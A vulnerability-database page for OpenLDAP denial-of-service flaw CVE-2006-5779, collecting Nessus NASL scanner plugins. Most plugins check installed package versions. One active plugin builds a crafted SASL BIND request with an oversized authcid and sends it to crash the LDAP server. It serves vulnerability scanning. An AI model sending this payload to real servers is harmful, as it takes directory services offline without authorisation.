CVE-2006-5779 - Reachable Assertion vulnerability in multiple products
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: NONE
Availability impact: HIGH
Summary
OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 2 |
OS | | 3 |
Common Weakness Enumeration (CWE)
Nessus
NASL family: SuSE Local Security Checks
NASL id: SUSE_SA_2006_072.NASL
description: The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap
last seen: 2019-10-28
modified: 2007-02-18
plugin id: 24449
published: 2007-02-18
reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/24449
title: SUSE-SA:2006:072: openldap2-client
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:072
#

if ( ! defined_func("bn_random") ) exit(0);

include("compat.inc");

if(description)
{
  script_id(24449);
  script_version ("1.9");

  name["english"] = "SUSE-SA:2006:072: openldap2-client";
  script_name(english:name["english"]);

  script_set_attribute(attribute:"synopsis", value:
    "The remote host is missing a vendor-supplied security patch" );
  script_set_attribute(attribute:"description", value:
    "The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. This is tracked by the Mitre CVE ID CVE-2006-5779." );
  script_set_attribute(attribute:"solution", value:
    "http://www.novell.com/linux/security/advisories/2006_72_openldap2.html" );
  script_set_attribute(attribute:"risk_factor", value:"High" );

  script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/18");
  script_end_attributes();

  summary["english"] = "Check for the version of the openldap2-client package";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  family["english"] = "SuSE Local Security Checks";
  script_family(english:family["english"]);

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/SuSE/rpm-list");
  exit(0);
}

include("rpm.inc");

if ( rpm_check( reference:"openldap2-client-2.2.27-6.4", release:"SUSE10.0") )
{
  security_hole(0);
  exit(0);
}
if ( rpm_check( reference:"openldap2-client-2.2.23-6.6", release:"SUSE9.3") )
{
  security_hole(0);
  exit(0);
}
```

NASL family: Ubuntu Local Security Checks
NASL id: UBUNTU_USN-384-1.NASL
description: Evgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 27967
published: 2007-11-10
reporter: Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/27967
title: Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Ubuntu Security Notice USN-384-1. The text
# itself is copyright (C) Canonical, Inc. See
# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered
# trademark of Canonical, Inc.
#

include("compat.inc");

if (description)
{
  script_id(27967);
  script_version("1.15");
  script_cvs_date("Date: 2019/08/02 13:33:01");

  script_cve_id("CVE-2006-5779");
  script_bugtraq_id(20939);
  script_xref(name:"USN", value:"384-1");

  script_name(english:"Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)");
  script_summary(english:"Checks dpkg output for updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:
      "The remote Ubuntu host is missing one or more security-related patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
      "Evgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://usn.ubuntu.com/384-1/"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected ldap-utils, libldap-2.2-7 and / or slapd packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:ldap-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libldap-2.2-7");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:slapd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:5.10");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.06:-:lts");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.10");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/10");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Ubuntu Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");

  exit(0);
}

include("audit.inc");
include("ubuntu.inc");
include("misc_func.inc");

if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/Ubuntu/release");
if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
release = chomp(release);
if (! ereg(pattern:"^(5\.10|6\.06|6\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 5.10 / 6.06 / 6.10", "Ubuntu " + release);
if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);

flag = 0;

if (ubuntu_check(osver:"5.10", pkgname:"ldap-utils", pkgver:"2.2.26-3ubuntu0.2")) flag++;
if (ubuntu_check(osver:"5.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-3ubuntu0.2")) flag++;
if (ubuntu_check(osver:"5.10", pkgname:"slapd", pkgver:"2.2.26-3ubuntu0.2")) flag++;
if (ubuntu_check(osver:"6.06", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu2.2")) flag++;
if (ubuntu_check(osver:"6.06", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu2.2")) flag++;
if (ubuntu_check(osver:"6.06", pkgname:"slapd", pkgver:"2.2.26-5ubuntu2.2")) flag++;
if (ubuntu_check(osver:"6.10", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu3.1")) flag++;
if (ubuntu_check(osver:"6.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu3.1")) flag++;
if (ubuntu_check(osver:"6.10", pkgname:"slapd", pkgver:"2.2.26-5ubuntu3.1")) flag++;

if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_WARNING,
    extra      : ubuntu_report_get()
  );
  exit(0);
}
else
{
  tested = ubuntu_pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ldap-utils / libldap-2.2-7 / slapd");
}
```

NASL family: SuSE Local Security Checks
NASL id: SUSE_OPENLDAP2-CLIENT-2282.NASL
description: OpenLDAP libldap
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 27364
published: 2007-10-17
reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/27364
title: openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openldap2-client-2282.
#
# The text description of this plugin is (C) SUSE LLC.
#

include("compat.inc");

if (description)
{
  script_id(27364);
  script_version ("1.12");
  script_cvs_date("Date: 2019/10/25 13:36:28");

  script_cve_id("CVE-2006-5779");

  script_name(english:"openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)");
  script_summary(english:"Check for the openldap2-client-2282 patch");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
      "OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash (CVE-2006-5779)."
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openldap2-client packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client-32bit");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.1");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/17");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE10\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "10.1", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

flag = 0;

if ( rpm_check(release:"SUSE10.1", reference:"openldap2-client-2.3.19-18.11") ) flag++;
if ( rpm_check(release:"SUSE10.1", cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openldap2-client / openldap2-client-32bit");
}
```

NASL family: SuSE Local Security Checks
NASL id: SUSE9_11307.NASL
description: OpenLDAP libldap
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 41106
published: 2009-09-24
reporter: This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/41106
title: SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The text description of this plugin is (C) Novell, Inc.
#

include("compat.inc");

if (description)
{
  script_id(41106);
  script_version("1.6");
  script_cvs_date("Date: 2019/10/25 13:36:28");

  script_cve_id("CVE-2006-5779");

  script_name(english:"SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SuSE 9 host is missing a security-related patch."
  );
  script_set_attribute(
    attribute:"description",
    value:
      "OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. (CVE-2006-5779)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply YOU patch number 11307.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/22");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/09/24");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented.");

flag = 0;
if (rpm_check(release:"SUSE9", reference:"openldap2-client-2.2.24-4.22")) flag++;
if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"openldap2-client-32bit-9-200611171828")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else exit(0, "The host is not affected.");
```

NASL family: Denial of Service
NASL id: OPENLDAP_SASL_BIND_DOS.NASL
description: The remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 23625
published: 2006-11-07
reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/23625
title: OpenLDAP SASL authcid Name BIND Request DoS
code:

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(23625);
  script_version("1.19");

  script_cve_id("CVE-2006-5779");
  script_bugtraq_id(20939);

  script_name(english:"OpenLDAP SASL authcid Name BIND Request DoS");
  script_summary(english:"Tries to crash OpenLDAP");

  script_set_attribute(attribute:"synopsis", value:
    "The remote LDAP server is prone to a denial of service attack." );
  script_set_attribute(attribute:"description", value:
    "The remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host." );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/450728/30/0/threaded" );
  # http://www.openldap.org/its/index.cgi/Archive.Software%20Bugs?id=4740;expression=authcid%20Name%20BIND%20Request;selectid=4740;usearchives=1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9daf484d" );
  script_set_attribute(attribute:"see_also", value:"http://www.openldap.org/software/release/changes.html" );
  script_set_attribute(attribute:"solution", value:
    "Upgrade to OpenLDAP 2.3.29 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/07");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/06");
  script_cvs_date("Date: 2018/11/15 20:50:21");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:openldap:openldap");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 389);

  exit(0);
}

include("global_settings.inc");
include("byte_func.inc");
include("misc_func.inc");

port = get_service(svc:"ldap", default: 389, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (!soc) exit(0);

id = rand() % 1024;
set_byte_order(BYTE_ORDER_BIG_ENDIAN);
req_bind1 =
  mkbyte(0x30) +                              # universal sequence
  mkbyte(0x17) +                              # length of the request
  mkbyte(2) + mkbyte(2) + mkword(id) +        # message id (random)
  mkbyte(0x60) +                              # bind request
  mkbyte(0x11) +                              # length of request
  mkbyte(2) +                                 # version (3)
  mkbyte(1) + mkbyte(3) + mkbyte(4) +         # authentication (SASL)
  mkbyte(0) + mkbyte(0xa3) + mkbyte(10) + mkbyte(4) + mkbyte(8) + "CRAM-MD5";
send(socket:soc, data:req_bind1);
res = recv(socket:soc, length:1024);

# If...
if (
  # the response is long enough and..
  strlen(res) > 5 &&
  # it looks like an LDAP message and...
  getbyte(blob:res, pos:0) == 0x30 &&
  # it's a response to our request.
  (mkword(id) + mkbyte(0x61)) >< res
)
{
  # Try to kill the server.
  id = id - 1;
  req_bind2 =
    mkbyte(0x30) +                            # universal sequence
    mkbyte(0x82) + mkword(0x041f) +           # length of the request
    mkbyte(2) + mkbyte(2) + mkword(id) +      # message id (random)
    mkbyte(0x60) +                            # bind request
    mkbyte(0x82) + mkword(0x0417) +           # length of request
    mkbyte(2) +                               # version (3)
    mkbyte(1) + mkbyte(3) + mkbyte(4) +       # authentication (SASL)
    mkbyte(0) + mkbyte(0xa3) + mkbyte(0x82) + mkword(0x040e) + mkbyte(4) + mkbyte(8) + "CRAM-MD5" +
    mkbyte(4) + mkbyte(0x82) + mkword(0x0400) + crap(data:" ", length:1024);
  send(socket:soc, data:req_bind2);
  res = recv(socket:soc, length:1024);
  close(soc);

  # If we didn't get a response, try to open another connection.
  if (strlen(res) == 0)
  {
    sleep(1);
    if (service_is_dead(port: port) > 0)
    {
      security_warning(port);
      exit(0);
    }
  }
}
```

NASL family: Mandriva Local Security Checks
NASL id: MANDRAKE_MDKSA-2006-208.NASL
description: An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 24593
published: 2007-02-18
reporter: This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/24593
title: Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandrake Linux Security Advisory MDKSA-2006:208.
# The text itself is copyright (C) Mandriva S.A.
#

include("compat.inc");

if (description)
{
  script_id(24593);
  script_version ("1.17");
  script_cvs_date("Date: 2019/08/02 13:32:48");

  script_cve_id("CVE-2006-5779");
  script_bugtraq_id(20939);
  script_xref(name:"MDKSA", value:"2006:208");

  script_name(english:"Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:
      "The remote Mandrake Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
      "An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue."
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-static-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-static-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-doc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-servers");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/18");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);

flag = 0;
if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"openldap-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"openldap-clients-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"openldap-doc-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK2006.0", reference:"openldap-servers-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;

if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"openldap-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"openldap-clients-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"openldap-doc-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2007.0", reference:"openldap-servers-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```

NASL family: Gentoo Local Security Checks
NASL id: GENTOO_GLSA-200611-25.NASL
description: The remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability) Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact : By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround : There is no known workaround at this time.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 23747
published: 2006-11-30
reporter: This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/23747
title: GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability
code:

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200611-25.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include("compat.inc");

if (description)
{
  script_id(23747);
  script_version("1.13");
  script_cvs_date("Date: 2019/08/02 13:32:43");

  script_cve_id("CVE-2006-5779");
  script_xref(name:"GLSA", value:"200611-25");

  script_name(english:"GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis",
    value:
      "The remote Gentoo host is missing one or more security-related patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
      "The remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability) Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact : By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround : There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/200611-25"
  );
  script_set_attribute(
    attribute:"solution",
    value:
      "All OpenLDAP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose 'net-nds/openldap'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openldap");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/30");
  script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/06");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

